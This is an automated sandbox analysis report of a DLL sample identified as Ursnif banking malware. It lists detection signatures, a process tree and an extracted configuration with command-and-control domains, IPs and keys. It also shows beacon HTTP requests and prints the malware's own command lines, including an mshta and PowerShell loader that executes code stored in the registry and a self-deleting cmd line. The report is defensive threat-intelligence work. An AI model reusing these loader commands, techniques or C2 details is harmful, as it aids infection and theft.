Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xaj0e933Uv.dll

Overview

General Information

Sample Name:xaj0e933Uv.dll
Analysis ID:620332
MD5:69e570a35f63ea12cbad7a10b25a6ea4
SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
Tags:dllgeoGoziISFBITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1900 cmdline: loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5132 cmdline: rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4084 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3504 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6592 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • mshta.exe (PID: 6548 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7144 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.50494a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.5596b40.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.5596b40.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.55694a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.2.rundll32.exe.3430000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:05/04/22-16:27:54.122082 05/04/22-16:27:54.122082
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:53.231327 05/04/22-16:27:53.231327
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:53.642851 05/04/22-16:27:53.642851
                      SID:2033203
                      Source Port:49769
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/04/22-16:27:33.120656 05/04/22-16:27:33.120656
                      SID:2033203
                      Source Port:49760
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: xaj0e933Uv.dllVirustotal: Detection: 40%Perma Link
                      Source: xaj0e933Uv.dllReversingLabs: Detection: 47%
                      Machine Learning detection for sample
                      Source: xaj0e933Uv.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03435FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_03435FBB
                      Source: xaj0e933Uv.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: Q5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.pdb( source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb@ source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: xaj0e933Uv.dll
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.pdb source: powershell.exe, 00000012.00000003.417182776.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.411412197.0000000006230000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.403782872.0000000006180000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Q5.pdb source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 5.pdb( source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0348BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0348BAD1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_034799BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_034765C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0347FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0347FD47

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80Jump to behavior
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49760 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49760 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49769 -> 185.189.151.28:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49769 -> 185.189.151.28:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/
                      Source: rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352389329.0000000003305000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2
                      Source: rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS
                      Source: rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/CXrN03_2FVmE00A0jBbCC/p4SMYAv6bGfrxOGb/gRNWHNhEtgY8LT7/5NqawS2a2mm
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000012.00000003.416459549.000001E6362BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000012.00000003.416780801.000001E636303000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.559953766.000001E636304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
                      Source: rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03431CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_03431CA5
                      Source: global trafficHTTP traffic detected: GET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
